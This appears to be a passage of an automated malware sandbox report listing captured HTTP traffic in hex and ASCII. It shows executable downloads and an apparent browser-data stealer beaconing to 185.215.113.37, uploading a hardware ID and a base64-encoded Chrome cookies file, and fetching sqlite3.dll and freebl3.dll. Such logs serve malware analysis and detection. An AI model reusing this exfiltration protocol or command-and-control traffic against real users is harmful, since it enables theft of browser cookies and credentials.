00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:16:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:16:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:16:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 30 45 34 37 45 34 43 44 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="hwid"7D0E47E4CD7B1953448019------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="build"doma------JECBGCFHCFIDHIDHDGDG--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIEHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 33 39 62 32 66 63 36 35 36 62 34 39 31 37 66 31 38 64 61 37 64 35 34 37 64 32 37 32 63 35 66 66 36 61 39 65 63 66 34 30 31 65 38 31 36 61 36 39 65 62 62 35 66 38 32 37 61 31 37 30 65 32 61 36 38 39 37 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 43 46 48 4a 45 42 41 41 46 49 45 42 47 48 49 49 45 2d 2d 0d 0a Data Ascii: ------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="token"3339b2fc656b4917f18da7d547d272c5ff6a9ecf401e816a69ebb5f827a170e2a6897e73------BAECFHJEBAAFIEBGHIIEContent-Disposition: form-data; name="message"browsers------BAECFHJEBAAFIEBGHIIE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBKHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 33 39 62 32 66 63 36 35 36 62 34 39 31 37 66 31 38 64 61 37 64 35 34 37 64 32 37 32 63 35 66 66 36 61 39 65 63 66 34 30 31 65 38 31 36 61 36 39 65 62 62 35 66 38 32 37 61 31 37 30 65 32 61 36 38 39 37 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 2d 2d 0d 0a Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="token"3339b2fc656b4917f18da7d547d272c5ff6a9ecf401e816a69ebb5f827a170e2a6897e73------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="message"plugins------EGHCAKKEGCAAFHJJJDBK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 33 39 62 32 66 63 36 35 36 62 34 39 31 37 66 31 38 64 61 37 64 35 34 37 64 32 37 32 63 35 66 66 36 61 39 65 63 66 34 30 31 65 38 31 36 61 36 39 65 62 62 35 66 38 32 37 61 31 37 30 65 32 61 36 38 39 37 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"3339b2fc656b4917f18da7d547d272c5ff6a9ecf401e816a69ebb5f827a170e2a6897e73------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"fplugins------CGHCGIIDGDAKFIEBKFCF--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAAHost: 185.215.113.37Content-Length: 7063Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDBHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 33 39 62 32 66 63 36 35 36 62 34 39 31 37 66 31 38 64 61 37 64 35 34 37 64 32 37 32 63 35 66 66 36 61 39 65 63 66 34 30 31 65 38 31 36 61 36 39 65 62 62 35 66 38 32 37 61 31 37 30 65 32 61 36 38 39 37 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="token"3339b2fc656b4917f18da7d547d272c5ff6a9ecf401e816a69ebb5f827a170e2a6897e73------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nU
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 33 39 62 32 66 63 36 35 36 62 34 39 31 37 66 31 38 64 61 37 64 35 34 37 64 32 37 32 63 35 66 66 36 61 39 65 63 66 34 30 31 65 38 31 36 61 36 39 65 62 62 35 66 38 32 37 61 31 37 30 65 32 61 36 38 39 37 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"3339b2fc656b4917f18da7d547d272c5ff6a9ecf401e816a69ebb5f827a170e2a6897e73------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file"------GDBAKKKFBGDHJKFHJJJJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 33 39 62 32 66 63 36 35 36 62 34 39 31 37 66 31 38 64 61 37 64 35 34 37 64 32 37 32 63 35 66 66 36 61 39 65 63 66 34 30 31 65 38 31 36 61 36 39 65 62 62 35 66 38 32 37 61 31 37 30 65 32 61 36 38 39 37 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 45 47 43 42 47 49 44 47 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="token"3339b2fc656b4917f18da7d547d272c5ff6a9ecf401e816a69ebb5f827a170e2a6897e73------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KFIJEGCBGIDGHIDHDGCBContent-Disposition: form-data; name="file"------KFIJEGCBGIDGHIDHDGCB--
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
